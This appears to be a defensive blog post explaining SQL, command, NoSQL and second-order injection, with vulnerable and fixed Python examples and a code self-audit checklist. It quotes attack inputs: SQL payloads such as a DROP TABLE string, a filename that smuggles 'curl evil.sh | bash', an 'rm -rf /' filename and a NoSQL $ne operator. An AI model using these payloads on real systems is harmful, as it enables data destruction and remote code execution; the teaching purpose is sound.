Injection is the oldest trick in the book, and it’s still here. It was at the very top of the OWASP list for years, and even though it’s slid down to A05 in 2025, don’t read that as “solved.” It dropped because frameworks finally started doing the right thing by default, not because developers stopped writing injectable code. I still find injection on assessments regularly - it just hides in the corners now: the one query someone built with string concatenation because the ORM was “too slow,” the shell command that takes a filename from a user, the search box that forwards straight into a NoSQL query.
The concept never changes, which is what I love about teaching it. Injection happens whenever untrusted input gets mixed into a command - SQL, a shell, an LDAP filter, whatever - and the interpreter can’t tell your data from your instructions. The attacker writes input that the interpreter reads as a command. That’s the entire bug. Once it clicks, you start seeing it everywhere, and more importantly, you start seeing the one fix that handles almost all of it.
Quick Answer: What is Injection?
Injection occurs when an application sends untrusted data to an interpreter as part of a command or query, and that data gets executed as code instead of being treated as data. The classic example is SQL injection, but the same flaw shows up in shell commands, LDAP, XPath, NoSQL queries, and more.
Why it’s still on the 2025 list: Frameworks made the safe path easy, but the unsafe path is still right there. Every time a developer builds a query or command by gluing strings together with user input, the door reopens.
The injection types I run into most:
- SQL injection - untrusted input concatenated into a database query
- Command injection - user input passed to a system shell
- NoSQL injection - attacker-controlled structure in MongoDB-style queries
- LDAP / XPath injection - the same pattern in directory and XML queries
- ORM injection - raw query escapes inside an otherwise-safe ORM
Why Injection Refuses to Die
Here’s what keeps it alive: the vulnerable code usually works perfectly for normal input. A login query built with string formatting authenticates real users all day long. It only breaks - spectacularly - when someone feeds it a quote and a comment. So it passes code review, passes tests, ships to production, and sits there as a working feature that happens to also be a complete database takeover waiting to happen.
The Core Mistake, In One Picture
Almost every injection bug I find is the same shape - building a command out of a string:
# THE BUG - user input becomes part of the SQL itself
def get_user(username):
    query = f"SELECT * FROM users WHERE username = '{username}'"
    return db.execute(query)
# Normal input: alice -> ...WHERE username = 'alice'
# Attacker input: ' OR '1'='1 -> ...WHERE username = '' OR '1'='1'
# Attacker input: '; DROP TABLE users; --
The database has no way to know the attacker’s quote was supposed to be data. It reads the whole string as one query and faithfully executes whatever the attacker assembled. That ' OR '1'='1 turns a login check into “return everyone,” and on drivers that allow stacked statements, the classic '; DROP TABLE does exactly what it looks like.
A Couple I Remember
- The “fast” reporting query. A team had a clean ORM everywhere except one analytics endpoint where someone dropped to raw SQL with f-strings “for performance.” A single user-supplied filter parameter there exposed the entire customers table. The ORM had been protecting them everywhere else - they just opened one window.
- The filename that ran commands. An image-processing feature shelled out to a CLI tool and passed the uploaded filename straight into the command string. A filename like photo.jpg; curl evil.sh | bash turned a thumbnail generator into remote code execution. The feature worked great for every file that wasn’t named like a payload.
How to Actually Stop Injection
The good news with injection is that the fix is almost boringly consistent across types: keep data and commands separate, and let the interpreter handle the data as data. Here’s how that looks in practice.
1. Use Parameterized Queries - Always
This is the whole ballgame for SQL injection. Don’t build queries by concatenation. Use placeholders and pass the values separately, so the database driver keeps your data strictly as data - it can never be reinterpreted as SQL.
# WRONG - string formatting puts input inside the query
query = f"SELECT * FROM users WHERE username = '{username}'"
db.execute(query)
# RIGHT - parameterized; the value can never become SQL
db.execute(
    "SELECT * FROM users WHERE username = %s",
    (username,),
)
# RIGHT - named parameters, same protection
db.execute(
    "SELECT * FROM users WHERE username = :username AND active = :active",
    {"username": username, "active": True},
)
The critical detail: the placeholder (%s, ?, or :name depending on your driver) is not string formatting. You are not building the final string yourself - you hand the query and the values to the driver separately, and it does the safe thing. The moment you find yourself using an f-string or .format() or + to assemble SQL, stop. That’s the bug.
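To see the difference for yourself, here is a minimal sketch using Python’s built-in sqlite3 module. The in-memory users table and the find_unsafe / find_safe helper names are my own assumptions for illustration, and sqlite3 uses ? as its placeholder rather than %s.

```python
import sqlite3

# Hypothetical in-memory table, for illustration only.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
conn.executemany(
    "INSERT INTO users (username) VALUES (?)",
    [("alice",), ("bob",), ("carol",)],
)

payload = "' OR '1'='1"


def find_unsafe(username: str) -> list:
    # BUG: the input is spliced into the SQL text itself.
    query = f"SELECT username FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def find_safe(username: str) -> list:
    # The driver binds the value, so it is only ever compared as a string.
    return conn.execute(
        "SELECT username FROM users WHERE username = ?", (username,)
    ).fetchall()


unsafe_rows = find_unsafe(payload)  # the WHERE clause is now always true
safe_rows = find_safe(payload)      # nobody is literally named "' OR '1'='1"
print(len(unsafe_rows), len(safe_rows))
```

The same payload matches every row through the f-string version and nothing through the bound version, which is the whole point: the text of the query never changes, only the value handed to the driver.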
2. Prefer an ORM, and Stay on Its Safe Path
ORMs like SQLAlchemy and the Django ORM parameterize everything for you, which is a big reason injection has dropped down the list. Use them for the bulk of your data access. The catch is the escape hatch: the moment you reach for raw SQL, you are responsible for parameterizing again.
# Django ORM - safe by construction
User.objects.filter(username=username)
# SQLAlchemy select() construct - safe, parameter bound automatically
session.execute(
    select(User).where(User.username == username)
)
# Raw SQL escape hatch - STILL must parameterize
session.execute(
    text("SELECT * FROM users WHERE username = :u"),
    {"u": username},  # never f-string the value into the text()
)
When I audit an ORM-based app, I grep for raw(, .extra(, text(, and execute( - those are where the ORM’s protection ends and human discipline takes over. That’s where the bugs live.
3. Avoid the Shell - Pass Arguments as a List
Command injection has an even cleaner fix: don’t invoke a shell at all. In Python, call subprocess with an argument list and shell=False (the default). With a list, the OS treats each element as a single argument - there’s no shell to interpret ;, |, &&, or backticks, so there’s nothing to inject into.
import subprocess
# WRONG - shell=True parses the whole string; user input can add commands
filename = user_input
subprocess.run(f"convert {filename} thumb.png", shell=True) # RCE waiting to happen
# RIGHT - argument list, no shell; filename is always one argument
subprocess.run(["convert", filename, "thumb.png"]) # shell=False is default
Even a malicious filename like x.jpg; rm -rf / is now harmless - it’s passed to convert as a single (nonsensical) filename argument, not interpreted by a shell. If you absolutely must build a command string, shlex.quote() each piece - but honestly, the argument-list approach is so much safer that I treat shell=True with user input as an automatic finding.
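If you want to convince yourself that the argument list really does deliver the payload as one argument, a rough sketch like this works. Instead of convert, it launches a tiny hypothetical child script (CHILD, my own stand-in) that just reports what it received, so it runs anywhere Python does.

```python
import shlex
import subprocess
import sys

# Hypothetical child program: prints the argument count, then each argument.
CHILD = "import sys; print(len(sys.argv) - 1); print('\\n'.join(sys.argv[1:]))"

malicious = "x.jpg; echo INJECTED"

# Argument list, no shell: the whole string arrives as a single argv entry.
result = subprocess.run(
    [sys.executable, "-c", CHILD, malicious],
    capture_output=True,
    text=True,
    check=True,
)
lines = result.stdout.splitlines()
arg_count = int(lines[0])
received = lines[1]

# If a command string is truly unavoidable (POSIX shells only), quote each piece.
quoted = shlex.quote(malicious)
print(arg_count, received, quoted)
```

The child sees exactly one argument containing the semicolon and everything after it. Nothing was split and nothing was executed. Note that shlex.quote() targets POSIX shells, so I would not lean on it for Windows command lines.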
4. Validate and Constrain What You Can’t Parameterize
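Parameterization protects values, but some parts of a query can’t be parameters - table names, column names, and sort directions are identifiers and keywords, not values. You can’t bind those, so don’t let them come from raw user input. Validate against an allowlist instead. (LIMIT and OFFSET values usually can be bound; where your driver won’t allow it, coerce them to integers and range-check them.)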
# Column/direction can't be a bound parameter - use an allowlist
ALLOWED_SORT = {"created_at", "name", "price"}
ALLOWED_DIR = {"ASC", "DESC"}
def build_sort(column: str, direction: str) -> str:
    if column not in ALLOWED_SORT or direction not in ALLOWED_DIR:
        raise ValueError("Invalid sort parameter")
    # Safe: both values are now from a known, fixed set
    return f"ORDER BY {column} {direction}"
Allowlisting (“is this one of the handful of values I expect?”) beats blocklisting (“does this contain something bad?”) every time. You’ll never enumerate every malicious input, but you can absolutely enumerate the valid ones. This is also the right mindset for input validation generally: validate type, length, format, and range as defense in depth - just don’t rely on it in place of parameterization.
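In a real query the two techniques sit side by side: the allowlist covers the pieces of SQL structure, and binding covers the values. Here is a small sketch of that combination using sqlite3; the products table and the list_products helper are assumptions of mine, not part of any particular codebase.

```python
import sqlite3

ALLOWED_SORT = {"created_at", "name", "price"}
ALLOWED_DIR = {"ASC", "DESC"}


def build_sort(column: str, direction: str) -> str:
    if column not in ALLOWED_SORT or direction not in ALLOWED_DIR:
        raise ValueError("Invalid sort parameter")
    # Both pieces now come from a known, fixed set.
    return f"ORDER BY {column} {direction}"


def list_products(conn, max_price: float, column: str, direction: str) -> list:
    # Structure (ORDER BY) goes through the allowlist; the value is bound.
    sql = "SELECT name, price FROM products WHERE price <= ? " + build_sort(
        column, direction
    )
    return conn.execute(sql, (max_price,)).fetchall()


# Hypothetical sample data, for illustration only.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (name TEXT, price REAL, created_at TEXT)")
conn.executemany(
    "INSERT INTO products VALUES (?, ?, ?)",
    [
        ("pen", 2.0, "2024-01-01"),
        ("book", 12.0, "2024-02-01"),
        ("lamp", 30.0, "2024-03-01"),
    ],
)

cheap_first_desc = list_products(conn, 20, "price", "DESC")
print(cheap_first_desc)
```

Anything outside the two sets, such as a column value of price; DROP TABLE products, raises ValueError before any SQL is assembled.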
5. Don’t Forget NoSQL and Other Interpreters
Injection isn’t a SQL-only problem - any interpreter that mixes data and commands is a target. NoSQL databases are a common blind spot because people assume “no SQL, no injection,” which isn’t true. If attacker-controlled input can become query structure (operators, not just values), you have the same flaw.
# WRONG - passing a raw dict from the request lets attackers inject operators
# {"username": {"$ne": null}} matches ANY user
users.find({"username": request_json["username"]})
# RIGHT - coerce to the expected type so input can only be a value
username = str(request_json["username"])
users.find({"username": username})
The same principle covers LDAP filters, XPath queries, template engines, and OS commands: identify every interpreter your input flows into, and make sure input can only ever be data to that interpreter, never structure or commands.
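One refinement worth considering: str() does neutralize an injected operator, but it does so silently, turning a dict into an odd-looking string. A stricter variant rejects anything that isn’t already a string. This is only a sketch; require_str, build_user_filter, and the 64-character cap are hypothetical choices of mine, and the code builds the filter without touching a real database.

```python
def require_str(value: object, max_len: int = 64) -> str:
    """Return value unchanged if it is a plain, reasonably short string."""
    if not isinstance(value, str):
        raise TypeError(f"expected a string, got {type(value).__name__}")
    if not value or len(value) > max_len:
        raise ValueError("string length out of range")
    return value


def build_user_filter(request_json: dict) -> dict:
    # The filter can only ever hold a string value, never an operator dict.
    return {"username": require_str(request_json.get("username"))}


ok_filter = build_user_filter({"username": "alice"})

try:
    build_user_filter({"username": {"$ne": None}})
    rejected = False
except TypeError:
    rejected = True

print(ok_filter, rejected)
```

Failing loudly also gives you something to log and alert on, which a quiet coercion does not.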
The One That Hides: Second-Order Injection
There’s a flavor of injection that slips past even careful teams, and it’s worth calling out because I’ve watched it survive a clean code review. It’s called second-order (or stored) injection, and the trick is that the malicious input doesn’t do anything when it’s first submitted - it gets safely stored, and then detonates later when some other part of the app pulls it back out and uses it unsafely.
Picture a registration form that correctly parameterizes the INSERT when saving a username. Great - no injection there. But the username it stored is admin'--. Weeks later, an admin dashboard builds a query like f"... WHERE username = '{stored_username}'" to look up that account. The input was trusted because “it’s already in our database” - but it was attacker-controlled all along.
# Step 1: stored SAFELY (parameterized) - reviewers see this and move on
db.execute("INSERT INTO users (username) VALUES (%s)", (username,))
# username = "admin'--" is now sitting in the table, inert
# Step 2: somewhere else, weeks later, it's used UNSAFELY
row = db.fetchone(f"SELECT * FROM audit WHERE actor = '{stored_username}'") # BUG
The lesson I drill into teams: data from your own database is not automatically trustworthy. It might have been attacker-controlled when it went in. Parameterize on the way out too, not just on the way in. The rule is simpler than it sounds - parameterize every query, regardless of where the value came from, and second-order injection disappears along with the first-order kind.
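The whole life cycle fits in a few lines of sqlite3. Treat this as a sketch under assumptions: the two tables and their contents are made up for the demo, and sqlite3 uses ? where the snippets above use %s.

```python
import sqlite3

# Hypothetical schema and data, for illustration only.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT)")
conn.execute("CREATE TABLE audit (actor TEXT, action TEXT)")
conn.executemany(
    "INSERT INTO audit VALUES (?, ?)",
    [("admin", "rotated API keys"), ("alice", "logged in")],
)

# Step 1: the attacker registers. The INSERT is parameterized, so nothing breaks.
conn.execute("INSERT INTO users (username) VALUES (?)", ("admin'--",))

# Later, another code path reads the stored name back out.
stored_username = conn.execute("SELECT username FROM users").fetchone()[0]

# Step 2 (BUG): the stored value is formatted into a new query.
# The SQL becomes ... WHERE actor = 'admin'--' and the rest is a comment.
unsafe_rows = conn.execute(
    f"SELECT action FROM audit WHERE actor = '{stored_username}'"
).fetchall()

# Fix: bind it, exactly as if it had come straight from the request.
safe_rows = conn.execute(
    "SELECT action FROM audit WHERE actor = ?", (stored_username,)
).fetchall()

print(unsafe_rows, safe_rows)
```

The unsafe lookup returns the real admin’s audit rows to an account that merely has admin in its name; the bound lookup returns nothing, because no audit entry belongs to an actor literally called admin'--.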
A Quick Injection Self-Audit
When I do a first pass for injection, it’s mostly targeted grepping. You can run the same checks on your own codebase in a few minutes:
- Search for f-strings, .format(), and + near execute(, SELECT, INSERT, UPDATE, DELETE.
- Search for shell=True and os.system( - then check whether any argument is user-influenced.
- Grep for ORM escape hatches: raw(, .extra(, text(, RawSQL.
- Look at NoSQL calls (find(, aggregate() that pass request data through without coercing types.
- Check that table/column/sort inputs go through an allowlist, not straight into the query.
Each hit is a place where data might be getting treated as a command. Most injection I find starts at exactly one of these lines.
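If you’d rather script the first pass than grep by hand, something like the following is a starting point. It is a deliberately crude sketch: the PATTERNS table and the scan function are my own hypothetical names, the regexes only catch uppercase SQL keywords on a single line, and I left out the NoSQL calls because find( matches far too much ordinary code. Expect false positives and misses; every hit still needs a human look.

```python
import re

SQL_KEYWORD = r"\b(?:SELECT|INSERT|UPDATE|DELETE)\b"

# Hypothetical pattern set mirroring the checklist; tune it for your codebase.
PATTERNS = {
    # An f-string containing SQL, or SQL followed by .format( or string +.
    "string-built SQL": re.compile(
        r"""f["'].*""" + SQL_KEYWORD
        + "|" + SQL_KEYWORD + r"""(?:.*\.format\(|.*["']\s*\+)"""
    ),
    "shell execution": re.compile(r"shell\s*=\s*True|os\.system\("),
    "ORM escape hatch": re.compile(r"\.raw\(|\.extra\(|\btext\(|\bRawSQL\b"),
}


def scan(source: str) -> list[tuple[int, str]]:
    """Return (line number, label) for every line matching a pattern."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for label, pattern in PATTERNS.items():
            if pattern.search(line):
                hits.append((lineno, label))
    return hits


sample = "\n".join(
    [
        'query = f"SELECT * FROM users WHERE username = \'{username}\'"',
        'db.execute("SELECT * FROM users WHERE id = %s", (user_id,))',
        'subprocess.run(f"convert {filename} thumb.png", shell=True)',
        "rows = User.objects.raw(sql)",
    ]
)
hits = scan(sample)
print(hits)
```

In the sample, the parameterized query on line 2 is the only line that doesn’t get flagged, which is roughly the signal you want from a first pass.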
Key Takeaways
After more years of finding injection than I’d like to admit, here’s the short version:
The Mindset
- Injection is a data-vs-command confusion. Every fix is really just “keep the attacker’s input as data.”
- Working code can still be injectable. It behaves perfectly for normal input - that’s why it ships.
- The escape hatches are where the bugs are. ORMs protect you until someone drops to raw SQL or shell=True.
What Actually Works
- Parameterized queries, always - never build SQL with f-strings, .format(), or +.
- Use an ORM for the bulk of data access, and re-parameterize whenever you go raw.
- Argument lists, not shells - subprocess.run([...]) with shell=False.
- Allowlist the parts you can’t parameterize (table/column/sort).
- Coerce types for NoSQL and other interpreters so input can’t become structure.
Injection sliding to A05 is genuinely good news - it means the safe defaults are winning. But it’s not gone, and it never fully will be, because the unsafe path is one f-string away. Master parameterized queries and the argument-list pattern for shells, and you’ve closed off the overwhelming majority of injection I still find in real applications. The fix is old, well-understood, and reliable - you just have to actually use it everywhere, including in that one “fast” query nobody wanted to touch.